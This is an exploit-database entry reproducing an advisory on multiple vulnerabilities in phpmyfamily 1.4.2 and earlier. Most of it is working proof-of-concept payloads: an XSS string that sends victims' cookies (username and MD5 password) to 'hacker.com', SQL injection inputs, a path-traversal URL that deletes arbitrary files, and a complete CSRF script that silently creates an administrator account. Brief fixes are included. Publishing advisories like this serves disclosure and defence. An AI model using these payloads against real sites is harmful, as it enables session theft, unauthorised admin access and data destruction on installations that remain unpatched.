header-logo
Suggest Exploit
vendor:
phpmyfamily
by:
Abysssec.com
5.5
CVSS
MEDIUM
Information Disclosure, XSS
200, 79
CWE
Product Name: phpmyfamily
Affected Version From:
Affected Version To: phpmyfamily <= 1.4.2
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:

phpmyfamily Multiple Remote Vulnerabilities

phpmyfamily is a dynamic genealogy website builder which allows geographically dispersed family members to maintain a central database of research which is readily accessable and editable. By having a central repository, family members can contribute as and when information becomes available without requiring them to send it to a central 'custodian', or disseminate via email, and allows anecdotal information and possible leads to be shared. The vulnerabilities include directory listing and cookie info disclosure, as well as cross-site scripting (XSS) vulnerabilities.

Mitigation:

To mitigate the directory listing vulnerability, create an index.html file in all folders. To mitigate the cookie info disclosure vulnerability, the application should not store sensitive information in cookies. To mitigate the XSS vulnerabilities, input validation and output encoding should be implemented.
Source

Exploit-DB raw data:

'''
  __  __  ____         _    _ ____  
 |  \/  |/ __ \   /\  | |  | |  _ \ 
 | \  / | |  | | /  \ | |  | | |_) |
 | |\/| | |  | |/ /\ \| |  | |  _ < 
 | |  | | |__| / ____ \ |__| | |_) |
 |_|  |_|\____/_/    \_\____/|____/ 

http://www.exploit-db.com/moaub-17-phpmyfamily-multiple-remote-vulnerabilities/
'''

- Title  : phpmyfamily Multiple Remote Vulnerabilities.
- Affected Version : phpmyfamily  <= 1.4.2
- Vendor  Site   : http://www.phpmyfamily.net/
- Discovery : Abysssec.com
 
- Description :
===============
phpmyfamily is a dynamic genealogy website builder which allows geographically dispersed family members 
to maintain a central database of research which is readily accessable and editable. By having a central repository, 
family members can contribute as and when information becomes available without requiring them to send it to a central 'custodian', 
or disseminate via email, and allows anecdotal information and possible leads to be shared.

- Vulnerabilities:
==================
1)Information  Disclosure:
--------------------------			
	1-1)Directory listing:
	+POC:
		http://site.com/phpmyfamily/admin/
		http://site.com/phpmyfamily/docs/
		http://site.com/phpmyfamily/images/ 
		http://site.com/phpmyfamily/inc/
		http://site.com/phpmyfamily/lang/ 
		http://site.com/phpmyfamily/styles/
	+Fix:
		Create index.html in all folders.
		
	1-2)Cookie Info:	
		User's Cookie contions username and MD5 password.
 
2)XSS:
------
	+Example Vulnerable Code:

	inc/passwdform.inc.php[line41-42]
				@$reason = $_REQUEST["reason"];
				echo "<font color=\"red\">".$reason."</font>";
	+POC:
	This poc send victim's cookie(contions username and MD5 password) to attacker site.
	http://SITE.com/phpmyfamily/inc/passwdform.inc.php?reason=<script>document.write("<img src='hacker.com/c.php?cookie="+document.cookie +"'/>")</script>
	
	+other poc:
	a)census.php[line23-26]
	http://SITE.com/phpmyfamily/census.php?ref=<script>document.write("<img src='hacker.com/c.php?cookie="+document.cookie +"'/>")</script>
	b)mail.php[line 25-35]
	http://SITE.com/phpmyfamily/mail.php?referer=<SCRIPT CODE>
	c)track.php[line 23-26]
	http://SITE.com/phpmyfamily/track.php?person=<SCRIPT CODE>
	d)people.php[line ]
	http://SITE.com/phpmyfamily/people.php?person=1>"><ScRiPt%20%0a%0d>alert(404385187829)%3B</ScRiPt>

3)Path Disclosure:
--------------------------------------
	+POC: 
		http://SITE.com/phpmyfamily/admin.php?func=ged
		http://SITE.com/phpmyfamily/inc/gedcom.inc.php	

4)SQL Injection:
-------------
	Code:
	:my.php[line 32-33]
		$query = "UPDATE ".$tblprefix."users SET email = '".$_POST["pwdEmail"]."' WHERE id = '".$_SESSION["id"]."'";
		$result = mysql_query($query) or die(mysql_error());
	+POC:
		http://SITE.com/phpmyfamily/my.php?func=email&pwdEmail=bbb@aa.com',edit='Y'%00
		<form method="post" action="my.php?func=email">
		<input type="text" name="pwdEmail" value="bbb@aa.com',edit='Y';%00">
		<input type="submit" value="send">
		</form>
	+Fix:
		use function quote_smart:
			$query = "UPDATE ".$tblprefix."users SET email = '".quote_smart($_POST["pwdEmail"])."' WHERE id = '".$_SESSION["id"]."'";
	+other:
		track.php[line 145-148]		http://SITE.com/phpmyfamily/track.php
		passthru.php [line 221-220] http://SITE.com/phpmyfamily/passthru.php
		and ...
		
5)Delete File:
--------------
CMS's users can delete each file by this Vulnerability.
	+Code:	passthru.php line[218-219]
		$docFile = "docs/".$_REQUEST["transcript"];
		if (@unlink($docFile) || !file_exists($docFile)) 
	+POC:
		http://SITE.com/phpmyfamily/passthru.php?func=delete&area=transcript&person=00002&transcript=../../../file.ext
	+Fix:
		use function quote_smart:
			$docFile = "docs/".quote_smart($_REQUEST["transcript"]);

6)XSRF:
-------
		+POC:
			<script>
				function creat_request(path,parameter,method){
				method = method || "post"; 
				var remote_dive = document.createElement('div');
  				remote_dive.id = 'Div_id';
  				var style = 'border:0;width:0;height:0;';
  				remote_dive.innerHTML = "<iframe name='iframename' id='iframeid' style='"+style+"'></iframe>";
  				document.body.appendChild(remote_dive);
   				var form = document.createElement("form");
  				form.setAttribute("method", method);
  				form.setAttribute("action", path);
  				form.setAttribute("target", "iframename");
	    		for(var key in parameter) 
				{
  				var hiddenField = document.createElement("input");
  				hiddenField.setAttribute("type", "hidden");
  				hiddenField.setAttribute("name", key);
  				hiddenField.setAttribute("value", parameter[key]);
  				      form.appendChild(hiddenField);
    				}
  				document.body.appendChild(form);  
  				form.submit();
				}    
      		    creat_request('http://SITE.com/phpmyfamily/admin.php?func=add',{'pwdUser':'aaaa','pwdEmail':'aa%40sss.com','pwdPwd1':'123','pwdPwd2':'123','pwdEdit':'on','pwdRestricted':'1910-01-01','pwdStyle':'default','Create':'Submit+Query'});
			</script>

Navigation

Suggest Exploit

Services By CQR